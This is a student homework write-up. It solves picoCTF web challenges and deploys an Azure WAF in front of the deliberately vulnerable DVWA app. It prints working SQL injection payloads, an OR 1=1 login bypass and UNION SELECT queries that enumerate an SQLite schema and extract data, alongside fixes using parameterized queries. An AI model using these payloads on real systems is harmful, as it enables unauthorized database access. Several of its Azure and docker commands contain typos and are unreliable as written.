# Homework 3 Cibersecurity
* Sebastián Navarro 00321588
* Eduardo Guerrero 00326712
* Mateo Pozo 00320780

## Part 1: picoCTF

### Local Authority

For this exercise, we are asked to launch an on-demand instance. Once the instance is launched, we are given a link to a webpage at [http://saturn.picoctf.net:58461/](http://saturn.picoctf.net:58461/). The hint for the exercise suggests finding the way the password is verified on the webpage.

When accessing the link, a webpage appears asking for a username and password, as shown below:

![ex1_1.png](attachment:f933599c-8be7-4793-83c9-416d6c59adef.png)

If we try any username and password, an error message appears indicating that the password is incorrect. However, one way to find out how the password is being verified is to inspect the webpage's source code.

To do this, we can use the developer options of our browser. In this case, we use the "network" tool to see the requests being made to the server. This is where all the requests the webpage makes to the server are shown, including images, CSS files, scripts, and HTTP requests like POST.

Therefore, we try any username and password and observe the requests made to the server.

![ex1_2.png](attachment:cb0b0311-3ed9-4449-9a4e-bbd90115380a.png)

We can see in the image that a POST request is made to `login.php`. When reviewing the source code of `login.php`, we notice that a JavaScript script called `secure.js` is executed.

![ex1_3.png](attachment:1aeb32d5-df30-4ffd-8a32-1d8d54ff9e8c.png)

This JavaScript code is responsible for verifying if the entered password is correct. By reviewing the code, we see that the password is checked using the `checkPassword` function, which takes the username and the entered password as arguments.

```javascript
function checkPassword(username, password)
{
  if( username === 'admin' && password === 'strongPassword098765' )
  {
    return true;
  }
  else
  {
    return false;
  }
}
```

Therefore, the correct username is 'admin' and the correct password is 'strongPassword098765'. When we enter this information, the flag for the exercise appears.

![ex1_4.png](attachment:488659d5-5072-4ea6-9450-309e9f00689c.png)

The flag for the exercise is `picoCTF{j5_15_7r4n5p4r3n7_05df90c8}`.

### WebDecode

From the name of the exercise, we can infer that this is a decoding problem. Like the previous exercise, we are required to launch an instance of on-demand. Once launched, we are given a link to a web page at http://titan.picoctf.net:51601/.

When we access the link, we are presented with a web page like this:

![ex2_1.png](attachment:34045dfa-c53f-452a-a709-dd20e02008d0.png)

The other clue suggests that we inspect the source code of the web page. When doing so, in the `About` section, we find a text that appears to be encoded, as follows:

![ex2_2.png](attachment:2f1cb79e-a361-42fd-b461-ca0361fa76f3.png)

The encoded text is `cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMWY4MzI2MTV9`, which appears to be a base64 encoded text since it contains alphanumeric characters and also has a length of 56, which is a multiple of 4. To decode it, we can use Python's `base64` library to find the flag.

In [2]:
import base64

encoded_text = "cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMWY4MzI2MTV9"

decoded_string = base64.b64decode(encoded_text).decode('utf-8')
print(decoded_string)

picoCTF{web_succ3ssfully_d3c0ded_1f832615}


The flag for the exercise is `picoCTF{web_succ3ssfully_d3c0ded_1f832615}`.

### More SQLi

Based on the name of the exercise and the hint, we can infer that this is an SQL injection problem with SQLite. Like the previous exercises, we are asked to launch an on-demand instance. Once launched, we are given a link to a webpage at http://saturn.picoctf.net:58685/ and we are presented with a webpage to enter a username and password, as shown below:

![ex3_1.png](attachment:c1c5f903-ec4c-4f38-8f77-58375e26b96e.png)

When testing any username and password, the following screen appears:

![ex3_2.png](attachment:b06e2c84-b465-49f9-ba22-d8eb0440df83.png)

This clearly shows the SQL query being executed on the server, which is as follows:

```sql
SELECT id FROM users WHERE password = '1234' AND username = 'admin'
```

This SQL statement tells us that the `id` is being selected from the `users` table where a matching password and username are required, both of which we do not know. Therefore, to successfully log in, we can attempt to inject an SQL statement that is always true. To do this, we can enter `' OR 1=1 --` in the password field. By doing this, the SQL statement that is executed on the server becomes:

```sql
SELECT id FROM users WHERE password = '' OR 1=1 --' AND username = 'admin'
```

This way, the `OR` condition validates a condition that is always true, such as `1 = 1`, and the password verification is skipped by commenting it out with the `--`. The `OR` condition returns true if at least one of the conditions is true, so by injecting this SQL statement, we successfully log in.

Once logged in, we see the following table:

![ex3_3.png](attachment:e4f17ef3-e122-4ff5-a61b-325234bb3800.png)

We can assume that the search button executes an SQL query to search for the city that matches the entered text. For example, if we enter 'Algiers', the SQL query executed on the server is as follows (assuming the table is named `cities`):

```sql
SELECT city, address, phone FROM cities WHERE city = 'Algiers'
```

![ex3_4.png](attachment:e697cc16-7538-42b6-a336-b883659ae887.png)

For more information, we want to obtain the table names from the database through SQL injection. To do this, we can enter `' UNION SELECT name,2,3 FROM sqlite_master WHERE type='table' --` in the search field. By doing this, the SQL statement executed on the server becomes (assuming the table is named `cities`):

```sql
SELECT city, address, phone FROM cities WHERE city = '' UNION SELECT name,2,3 FROM sqlite_master WHERE type='table' -- 
```

We use the `UNION` to join with the `sqlite_master` table to obtain the names of the tables in the SQLite database. We use `2` and `3` to match the number of columns in the table displayed.

![ex3_5.png](attachment:86f2d022-7a90-4da5-98d7-de9ed840494c.png)

We see that this statement shows the tables in the database: `hints`, `more_table`, `offices`, `users`.

Now, we want to obtain the column names for each table in the database. To do this, for the `users` table, we can enter `' UNION SELECT name,2,3 FROM PRAGMA_table_info('users') --` in the search field. By doing this, the SQL statement executed on the server becomes (now we know that the table shown is `offices`):

```sql
SELECT city, address, phone FROM offices WHERE city = '' UNION SELECT name,2,3 FROM PRAGMA_table_info('users') --
```

We use the `UNION` with `PRAGMA_table_info('users')` to get the column names of the `users` table.

![ex3_6.png](attachment:515e2cdd-6466-427d-a853-b7259a3f4974.png)

We do the same for the `offices` table and get the column names of the `offices` table:

```sql
SELECT city, address, phone FROM offices WHERE city = '' UNION SELECT name,2,3 FROM PRAGMA_table_info('offices') --
```

![ex3_7.png](attachment:8877ac22-8a3f-4ecd-b364-57bf8ec5cada.png)

We do the same for the `hints` table and get the column names of the `hints` table:

```sql
SELECT city, address, phone FROM offices WHERE city = '' UNION SELECT name,2,3 FROM PRAGMA_table_info('hints') --
```

![ex3_8.png](attachment:edf043e8-259c-4adc-bf6f-b1f9a0f559c7.png)

We do the same for the `more_table` table and get the column names of the `more_table` table:

```sql
SELECT city, address, phone FROM offices WHERE city = '' UNION SELECT name,2,3 FROM PRAGMA_table_info('more_table') --
```

![ex3_9.png](attachment:b1e2618c-3d3c-47b7-9a86-cbff623d6c63.png)

In this way, we have obtained the names of the tables and columns from the database. In summary:
* Tables: `hints`, `more_table`, `offices`, `users`
* Columns of the `users` table: `id`, `name`, `password`
* Columns of the `offices` table: `id`, `city`, `address`, `phone`
* Columns of the `hints` table: `id`, `info`
* Columns of the `more_table` table: `id`, `flag`

We see that the `more_table` table has a column called `flag`, so we can assume that the flag for the exercise is stored in this table. To get the flag, we can enter `' UNION SELECT flag,2,3 FROM more_table --` in the search field. By doing this, the SQL statement executed on the server becomes:

```sql
SELECT city, address, phone FROM offices WHERE city = '' UNION SELECT flag,2,3 FROM more_table -- 
```

![ex3_10.png](attachment:36234856-4917-40b1-af59-93a3875afc28.png)

The flag for the exercise is `picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_62aa7500}`.

#### Provide an explanation of which OWASP Top 10 was exploited

In this exercise, the **Injection vulnerability** from OWASP, specifically **SQL Injection**, was exploited, which ranks number 3 in the OWASP Top 10. This vulnerability occurs when an attacker inserts or "injects" SQL code into the input fields of a web form to gain access to the underlying database. In this case, the attacker took advantage of the lack of input validation in the username and password fields to inject malicious SQL code, allowing them to bypass authentication (using an injection like `' OR 1=1 --`) and access the database. Then, by using additional SQL injections, the attacker retrieved the table and column names, and finally extracted the **flag** from the `more_table` table. This demonstrates how the lack of input sanitization allows SQL queries to be manipulated, leading to unauthorized access to sensitive data.

![image.png](attachment:b508551b-756c-4c7d-9dd4-d3103d5d35f1.png)

#### What would be a way to patch the vulnerability?

To patch the vulnerability, the application should use **parameterized queries** or prepared statements to prevent SQL injection attacks. This technique separates the SQL query from the user input, ensuring that the input is treated as data and not as part of the SQL query. By using parameterized queries, the database engine can distinguish between the SQL code and the user input, preventing the injection of malicious code. Additionally, the application should validate and sanitize user input to ensure that it meets the expected format and does not contain any malicious code. By implementing these security measures, the application can protect against SQL injection attacks and prevent unauthorized access to the database.

For example, the application could use the following parameterized query to validate the username and password:

```sql
SELECT id FROM users WHERE password = ? AND username = ?
```

By using placeholders (`?`) for the user input, the application can pass the input as parameters to the query, preventing SQL injection attacks. This approach ensures that the input is treated as data and not as part of the SQL query, protecting against malicious code injection.

## Part 2: WAF

A web application firewall is a layer 7 defense mechanism that helps protect web apps 
by filtering and monitoring HTTP traffic between the server and the clients. This mechanism
protects applications from common attacks like cross-side scripting, file inclusion, SQL 
injections, among others. 

By deploying a WAF in front of our web application, a defense mechanism is placed between
the web application and the internet. In this way, the WAF works as a reverse proxy that protects the server from direct exposure by having clients go thorugh the WAF before reaching the server. 

### Deploying DVWA in Azure

First, we deploy the instance of dvwa without the WAF. For this, we have to first create a resource group in Azure, to which we are going to upload our dvwa docker image `vulnerables/web-dvwa`.

To create the resource group, we use Azure CLI:

``` bash
az group create --name csdvwa --location eastus
```

After the resource group is created, we have to create an Azure Container Registry within our resource group to which we are going to push our Docker image. 

On our machine, run the following commands: 

```bash
az login

az acr login --name myregisto

docker pull vulnerables/web-vwa

docker tag vulnerables/web-dvwa myregistro.azurecr.io/vulnerables/we-dvwa

docker push myregistro.azurecr.io/vulnerables/web-dvwa
```
```

To check if our docker image was succesfully pushed to the ACR, we run the following command in our terminal.

```bash
az acr repository list --name myregistro --output table
```

Now, back in the Azure CLI, we can create the container within our resource group.

```bash
# Generate a unique name for the container
DNS_NAME_LABEL=DVWA-$RANDO

# Create the container from the ACR
az container create \
  --resource-group csdvwa \
  --name dvwa \
  --image myregistro.azurecr.io/vulnerables/web-dvwa \
  --ports 80 \
  --dns-name-label $DNS_NAME_LABEL \
  --location eastus \ 
```

To see the created container details, and to start it we run:

```bash
# See the container details
az container show \
  --resource-groupcsdvwaC \
  --name dv

# Start the container
az container start \
  --resource-groupcsdvwaC \
  --name dvwawa
```

Now the application is deployed; however, it is vulnerable to all the kinds of attacks it was designed to receive. For example, a SQL injection:

![image.png](attachment:0b88a5ed-b013-49f6-b678-bb977fced6bd.png)

### The Azure Web Application Firewall

In this work, we apply the Azure Web Application Firewall (WAF). Azure WAF is a cloud-scale security add-on for securing web applications against their most prevalent attacks including SQL injection, cross-site scripting (XSS) and DDoS. It operates by filtering and monitoring HTTP(S) requests, blocking malicious traffic based on customizable rules and predefined security policies. Among its features are real-time threat intelligence, in-built defense using components of Azure services, and coverage of OWASP top-10 vulnerabilities. By taking advantage of Azure WAF this work aims to prevent attacks on the DVWA we are testing.

The Azure WAF operates in primarily two modes: detection and prevention. In Detection mode, the WAF maintains a log of both the incoming and outgoing traffic and records requests that are filtered according to its rule base, but does not actively deny them. This mode has the benefit of the ability to determine how WAF rules affect application traffic, and find possible threats without affecting the user experience. Whilst in Prevention mode the WAF actively blocks any comms fulfilling its security rules, thereby preventing access to possibly malicious traffic to the app. This mode provides real-time protection by automatically enforcing security policies and mitigating attacks, ensuring that only legitimate requests are processed. Both modes are configurable with custom rules to meet the security requirements, offering flexibility and control on application security.

### Setting up the WAF

To deploy a web application with WAF enabled, we need to set up several resources. All of these should be installed within the same group of resources of the web application (csdvwa). 

![image.png](attachment:c27b13a5-50e9-4bcf-8eff-aadb51a41968.png)

#### Container Instance: waf-dvwa

Since the traffic directed to the dvwa won't directly reach it, we need to set up this container with a configuration so that traffic always passes through the firewall first. 

![instancia-waf-dvwa.png](attachment:78f9367f-2047-4af7-a268-c0697083d5bd.png)

#### Virtual network: csdvwa-vnet 

The configuration from this container will be different, we need to create a virtual network (csdvwa-vnet).  

![private_network_setup_dvwa.png](attachment:aa0ee86b-4beb-4181-992a-7dd4f6781e38.png)

This vnet will be configured with the defaults:

![setup-private-network.png](attachment:74620c61-10ce-4ab2-956f-1df5c616f627.png)

#### Log Analytics workspace

The Log Analytics workspace will enable centralized storage and management of logs from both the Application Gateway and the Web Application Firewall (WAF). This setup will provide comprehensive visibility into network traffic, including connection details and potential security threats. By aggregating these logs, we can efficiently monitor, analyze, and detect anomalous behavior, facilitating quick identification and response to potential attacks or suspicious activities.

To create the Log Analytics workspace, we need to name it and use the default configurations: 

![waf-logs-configs1.png](attachment:d84ad9ad-1052-478c-bf5d-186e9796d375.png)

#### Application Gateway

Azure Web Application Firewall (WAF) needs to be associated with an Application Gateway because the gateway acts as a Layer 7 load balancer that manages and routes incoming web traffic to backend services. 

To create the application gateway, we follow the configuration below:

![gateway-configs-2.png](attachment:2bd9bb6c-f8fb-46db-ba53-65db00b5b7df.png)

**Application Gateway WAF policy**

The WAF policy will protect the application from many common web attacks, including those listed in the OWASP to 10 threats. We set this policy up in the gateway configutation:

![gateway-config1.png](attachment:37bf416c-4f03-4547-930f-145e789be315.png)

#### Virtual network: waf-vnet

We need to create another vnet for the Application Gateway. The application gateway and the dvwa container will be connected later.

![waf-vnet-config1.png](attachment:b0d24c09-c9ff-4f93-9c27-2495ae5ce36d.png)

#### Public IP Address

To configure the gateway, we need to create a public IP address to which the users will connect to the application passing through the WAF. We name this IP address `secure-dvwa`. To create it, we just name it in the front-end configuration of the Application Gateway, and keep the defaults.

![gateway-config-public-ip-4.png](attachment:5a136b5b-dd60-4f34-bd54-642636f03a1c.png)

#### Back-end pools

Inside the Application Gateway configuration, we add a backend pool without targets. This is named `secure-dvwa-pool`, and the secure-dvwa instance container will be added to this pool, so that the Application Gateway redirects the traffic to it. 

![config-dvwa-configs-5.png](attachment:69c95e15-d383-48d9-ab1e-983b0ffce812.png)

#### Routing rules

Now we need to add the routing rules for our configuration. For this, we use the default configurations; we just need to name the routing rule name `waf-route-rule`.

![reglas-enrutamiento-1.png](attachment:81965c64-e690-4aa5-8ff8-90e380524f48.png)

For the listener: 

![reglas-enrutamiento-1.png](attachment:8f18ab2c-ea69-4ad8-9596-de7daac02bc5.png)

And for the backend targets:

![backend-routing-rules-1.png](attachment:35bb2983-ea41-4c40-ab25-e76435334de2.png)

Note that the backend targets need a new backend setting as follows:

![backend-config-1.png](attachment:0c452b44-7752-4eed-ad53-933487ab9e73.png)

Finally, our Application Gateway will be configured as follows:

![gateway-config-params.png](attachment:381b9fc6-af36-46e3-993e-fe459f94fc5b.png)

#### Peering

To allow traffic from the waf-vnet into the csdwa-vnet, we need to create a peering under the waf-vnet resources with the following configuration:

![peering-configs-1.png](attachment:2b138ff0-e494-4c88-9f4c-e618e8d4536f.png)

![peering-configs-2.png](attachment:fc79b7eb-b049-45e3-9ef9-041027e03098.png)

### WAF testing

#### SQL Injection ####

![image.png](attachment:image.png)

Usually this injection would give us the tables of the database, however.

![image.png](attachment:image.png)

We can see on the url that this belongs to sql injection

#### Brute Force ###

![image.png](attachment:image.png)

Usually, this lets us bypass the security of the webpage, however

![image-2.png](attachment:image-2.png)

We can see on the url that this belongs to brute force

#### Vulnerability XSS ####

![image.png](attachment:image.png)

Usually this lets us send an alert, however

![image-2.png](attachment:image-2.png)

We can see on the url that this belongs to xss


#### Video demonstration ####

![image.png](attachment:image.png)

[Video demonstration](https://youtu.be/fE7ezmKbn3U)
